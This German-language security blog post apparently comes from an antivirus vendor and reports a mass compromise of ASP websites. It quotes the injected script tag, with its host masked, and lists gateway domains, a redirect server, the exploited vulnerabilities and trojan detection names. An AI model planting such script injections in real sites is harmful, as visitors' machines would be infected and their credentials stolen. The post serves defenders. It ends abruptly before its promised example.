
Wir sind immer noch damit beschäftigt, herauszufinden, wie die Sites genau gehackt wurden, doch unterm Strich erscheinen zwei Szenarien am wahrscheinlichsten: Der Einsatz einer SQL-Injection oder die Verwendung von bereits gestohlenen Accounts zu den entsprechenden Websites. Eine Gemeinsamkeit besteht darin, dass die meisten gehackten Sites auf irgendeinem Typ von ASP-Engine laufen.
Das Ausmaß dieser Angriffswelle ist zwar nicht mit dem ersten “Chinesischen Massenhack” im Frühjahr dieses Jahres vergleichbar, der mehr als 1,5 Millionen Webressourcen betraf. Aber die Sache befindet sich immer noch im Entwicklungsstadium und die Ähnlichkeit der Schadprogramme, die in beiden Fällen verwendet wurden, brachte uns zu dem Schluss, dass diese neue Angriffswelle eine potentielle Gefahr darstellt.
Wie funktionieren die Attacken?
Die Angreifer fügen dem html der gehackten Sites den Tag < script src=http://******/h.js > hinzu.
Der Link führt zu einem Java Script, das sich auf einem von sechs Servern befindet. Diese Server funktionieren als Gateways für weitere Umleitungen von Anfragen. Sechs dieser Gateways haben wir bereits identifiziert und der Blacklist in unserem Antivirus-Produkt hinzugefügt.
1 2 3 4 5 6 |
armsart.com acglgoa.com idea21.org yrwap.cn s4d.in dbios.org |
Alle Besucher der gehackten Websites werden unbemerkt auf einen schädlichen Server namens vvexe.com umgeleitet, der sich in China befindet. Daraufhin kommen Exploits zum Einsatz, die zum Angriff auf die Anwendercomputer verwendet werden.
Derzeit werden verschiedene Exploits eingesetzt, die Sicherheitslücken im Internet Explorer, im Macromedia Flash Player und die ActiveX-Schwachstelle (MS08-053) ausnutzen, für die Microsoft vor nicht einmal zwei Monaten ein Patch veröffentlicht hat. Einige Exploits richten sich gegen die Anwender von Firefox.
Die folgenden Schadprogramme werden auf der Site von unserem Antivirus entdeckt:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
Trojan-Downloader.HTML.Agent.ls Trojan-Downloader.SWF.Agent.ae Trojan-Downloader.SWF.Agent.ad Trojan-Downloader.SWF.Agent.af Trojan-Downloader.SWF.Small.em Trojan-Downloader.SWF.Small.en Trojan-Downloader.JS.Agent.cwt Trojan-Downloader.JS.Agent.cwu Trojan-Downloader.JS.Agent.cww Trojan-Downloader.JS.Agent.cwv Trojan-Downloader.JS.Agent.cwx Trojan-Downloader.JS.Agent.cwy Exploit.JS.Agent.xu Trojan-Dropper.JS.Agent.z |
Dieser Trojaner ist in der Lage, weitere Schädlinge herunter zu laden, deren Anzahl und Dateien in einer speziellen Konfiguraionsdatei auf vvexe.com site abgelegt sind.
Gestern konnten wir den Download von drei Trojanern beobachten:
Trojan-GameThief.Win32.WOW.cer – Ein Trojaner, der Zugangsdaten von World of Warcraft-Accounts stiehlt.
Trojan-Spy.Win32.Pophot.gen – Ein weiteres Spionageprogramm, das Daten stiehlt und zudem versucht, eine Reihe von Antiviren-Lösungen zu löschen.
Trojan.Win32.Agent.alzv – Dieser Trojaner lädt weitere Spionagetrojaner herunter, und zwar Trojan-PSW.Win32.Delf.ctw, Trojan-PSW.Win32.Delf.ctx, Trojan-PSW.Win32.Delf.cty.
Wenn Sie eine Website besitzen oder verwalten, die eine ASP-Engine verwendet, überprüfen Sie alle Seiten auf das Vorhandensein von Links wie z.B.:
Chinesischer Massenhack Teil 2